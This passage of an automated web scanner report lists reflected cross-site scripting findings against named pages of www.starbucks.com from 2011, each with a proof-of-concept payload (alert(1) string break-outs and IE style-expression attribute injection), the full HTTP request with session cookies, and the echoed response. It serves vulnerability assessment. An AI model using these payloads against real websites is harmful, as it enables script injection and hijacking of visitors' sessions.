r flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643064965001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?60e4f";alert(1)//ccc1047f29b=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.51. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e440"style%3d"x%3aexpression(alert(1))"503f9615132 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e440"style="x:expression(alert(1))"503f9615132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast?5e440"style%3d"x%3aexpression(alert(1))"503f9615132=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:11 GMT
Connection: close
Content-Length: 43839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?5e440"style="x:expression(alert(1))"503f9615132=1" />
...[SNIP]...

2.52. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47d4a"%3balert(1)//629b8d5aeec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47d4a";alert(1)//629b8d5aeec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast?47d4a"%3balert(1)//629b8d5aeec=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:17 GMT
Connection: close
Content-Length: 43744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
= {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643064966001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?47d4a";alert(1)//629b8d5aeec=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.53. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca7e4"style%3d"x%3aexpression(alert(1))"acb65ae86d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca7e4"style="x:expression(alert(1))"acb65ae86d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast?ca7e4"style%3d"x%3aexpression(alert(1))"acb65ae86d6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:20 GMT
Connection: close
Content-Length: 40353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast?ca7e4"style="x:expression(alert(1))"acb65ae86d6=1"/>
...[SNIP]...

2.54. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a6b9"style%3d"x%3aexpression(alert(1))"d5a41dc5583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a6b9"style="x:expression(alert(1))"d5a41dc5583 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast?1a6b9"style%3d"x%3aexpression(alert(1))"d5a41dc5583=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:22 GMT
Connection: close
Content-Length: 40708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast?1a6b9"style="x:expression(alert(1))"d5a41dc5583=1"/>
...[SNIP]...

2.55. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff70"style%3d"x%3aexpression(alert(1))"6f0990795c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eff70"style="x:expression(alert(1))"6f0990795c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/latin-america?eff70"style%3d"x%3aexpression(alert(1))"6f0990795c7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:01 GMT
Connection: close
Content-Length: 46735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?eff70"style="x:expression(alert(1))"6f0990795c7=1" />
...[SNIP]...

2.56. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9edbf"%3balert(1)//c0d90c55a41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9edbf";alert(1)//c0d90c55a41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/latin-america?9edbf"%3balert(1)//c0d90c55a41=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:14 GMT
Connection: close
Content-Length: 46640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643101031001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?9edbf";alert(1)//c0d90c55a41=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.57. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4325"style%3d"x%3aexpression(alert(1))"db73de7f50b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4325"style="x:expression(alert(1))"db73de7f50b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/multi-region-blends?f4325"style%3d"x%3aexpression(alert(1))"db73de7f50b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:36 GMT
Connection: close
Content-Length: 42978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?f4325"style="x:expression(alert(1))"db73de7f50b=1" />
...[SNIP]...

2.58. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3a82"%3balert(1)//5ab9813aafa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3a82";alert(1)//5ab9813aafa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/multi-region-blends?d3a82"%3balert(1)//5ab9813aafa=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:39 GMT
Connection: close
Content-Length: 42883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
vars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643101033001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?d3a82";alert(1)//5ab9813aafa=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.59. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 124ea"%3balert(1)//bd639cab20c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 124ea";alert(1)//bd639cab20c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffeehouse?124ea"%3balert(1)//bd639cab20c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:59 GMT
Connection: close
Content-Length: 52656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
"text/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759747001";
   flashvars.playerLocation = "http://www.starbucks.com/coffeehouse?124ea";alert(1)//bd639cab20c=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.60. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df34"style%3d"x%3aexpression(alert(1))"fb0a4a5b623 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3df34"style="x:expression(alert(1))"fb0a4a5b623 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse?3df34"style%3d"x%3aexpression(alert(1))"fb0a4a5b623=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:56 GMT
Connection: close
Content-Length: 52751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse?3df34"style="x:expression(alert(1))"fb0a4a5b623=1" />
...[SNIP]...

2.61. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fa72"style%3d"x%3aexpression(alert(1))"5a47d7b77de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fa72"style="x:expression(alert(1))"5a47d7b77de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/community?9fa72"style%3d"x%3aexpression(alert(1))"5a47d7b77de=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:38 GMT
Connection: close
Content-Length: 41639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community?9fa72"style="x:expression(alert(1))"5a47d7b77de=1" />
...[SNIP]...

2.62. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community/mystarbucksidea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49dde"style%3d"x%3aexpression(alert(1))"e7346a933d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 49dde"style="x:expression(alert(1))"e7346a933d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/community/mystarbucksidea?49dde"style%3d"x%3aexpression(alert(1))"e7346a933d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:15 GMT
Connection: close
Content-Length: 41683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community/mystarbucksidea?49dde"style="x:expression(alert(1))"e7346a933d9=1"/>
...[SNIP]...

2.63. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f184b"style%3d"x%3aexpression(alert(1))"96125b2cebe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f184b"style="x:expression(alert(1))"96125b2cebe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/entertainment?f184b"style%3d"x%3aexpression(alert(1))"96125b2cebe=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:51 GMT
Connection: close
Content-Length: 54188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/entertainment?f184b"style="x:expression(alert(1))"96125b2cebe=1" />
...[SNIP]...

2.64. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90a4e"%3balert(1)//d2bb761e82e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90a4e";alert(1)//d2bb761e82e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffeehouse/entertainment?90a4e"%3balert(1)//d2bb761e82e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:54 GMT
Connection: close
Content-Length: 54093

